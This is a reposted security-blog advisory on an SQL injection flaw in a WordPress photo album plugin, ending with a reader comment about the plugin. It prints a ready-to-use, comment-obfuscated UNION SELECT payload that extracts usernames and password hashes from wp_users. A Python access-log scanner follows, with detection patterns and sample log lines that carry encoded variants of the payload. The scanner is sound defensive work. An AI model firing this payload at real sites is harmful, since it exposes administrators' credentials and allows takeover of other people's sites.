WordPress Photo album Remote SQL Injection Vulnerability


EXAMPLE
http://xxxxxxxx/?page_id=13&album= [exploit]
EXPLOIT
S@BUN&photo=-333333%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/concat(0x7c,user_login,0x7c,user_pass,0x7c)/**/from%2F%2A%2A%2Fwp_users/**WHERE%20admin%201=%201
# WordPress album PHOTO SQL Injection
# AUTHOR : S@BUN
# HOME 1 : http://www.milw0rm.com/author/1334
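Recommendation: change the permissions of the admin user and create a separate administrator account that is not used for publishing posts, or go directly into the database and rename admin to something else.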
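
To check whether a site has received requests of this shape, the access log can be searched for it. The Python below is an added example, not part of the original advisory or the plugin: it undoes layered percent-encoding, strips the `/**/` inline comments used in the payload above, and flags `album`/`photo` values that contain UNION SELECT or reference the WordPress user table. The log lines, addresses and function names are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

WATCHED_PARAMS = {"album", "photo"}          # parameters used in the advisory's URL
INLINE_COMMENT = re.compile(r"/\*.*?\*/", re.S)
UNION_SELECT = re.compile(r"\bunion\b(?:\s+all)?\s+select\b", re.I)
USER_TABLE = re.compile(r"\b(?:wp_users|user_login|user_pass)\b", re.I)
REQUEST = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')

def normalize(value):
    """Undo layered percent-encoding, then replace SQL inline comments with spaces."""
    for _ in range(3):                       # bounded, covers double encoding
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return re.sub(r"\s+", " ", INLINE_COMMENT.sub(" ", value)).strip()

def inspect_url(url):
    """Return a list of findings for one request URL (empty list = no match)."""
    findings = []
    for name, raw in parse_qsl(urlsplit(url).query, keep_blank_values=True):
        if name.lower() not in WATCHED_PARAMS:
            continue
        value = normalize(raw)
        if UNION_SELECT.search(value):
            findings.append((name, "union-select"))
        if USER_TABLE.search(value):
            findings.append((name, "wp-user-table"))
    return findings

def scan_log(lines):
    """Yield (line_number, findings) for access-log lines that match."""
    for number, line in enumerate(lines, 1):
        match = REQUEST.search(line)
        findings = inspect_url(match.group(1)) if match else []
        if findings:
            yield number, findings

# Constructed sample lines (combined log format, documentation addresses).
SAMPLE_LOG = [
    '198.51.100.7 - - [01/Jan/2024:10:00:00 +0000] "GET /?page_id=13&album=holiday&photo=42 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [01/Jan/2024:10:00:05 +0000] "GET /?page_id=13&album=x&photo=-1%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/concat(user_login,user_pass)/**/from/**/wp_users HTTP/1.1" 200 812',
    '203.0.113.9 - - [01/Jan/2024:10:00:09 +0000] "GET /?page_id=13&album=x&photo=-1%252F%252A%252A%252Funion%252F%252A%252A%252Fselect%252F%252A%252A%252F1 HTTP/1.1" 200 640',
]

if __name__ == "__main__":
    for number, findings in scan_log(SAMPLE_LOG):
        print(number, findings)
```

A hit in the log shows only that the request was sent; whether it succeeded depends on the plugin version installed at the time.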

When reposting this original article, please credit the source: [Lin's Space|Only]

Link to this article: http://clin003.com/exploits/wordpress-photo-album-remote-sql-injection-vulnerability-451/


One Response to WordPress Photo album Remote SQL Injection Vulnerability

  1. wiki says:

    This plugin is designed to easily manage and display your photo albums within your WordPress site. Plugin Admin Features: You can find the plugin admin section under Manage then submenu Photos. Manage and create albums. Move photos to and from albums. Upload and delete photos.
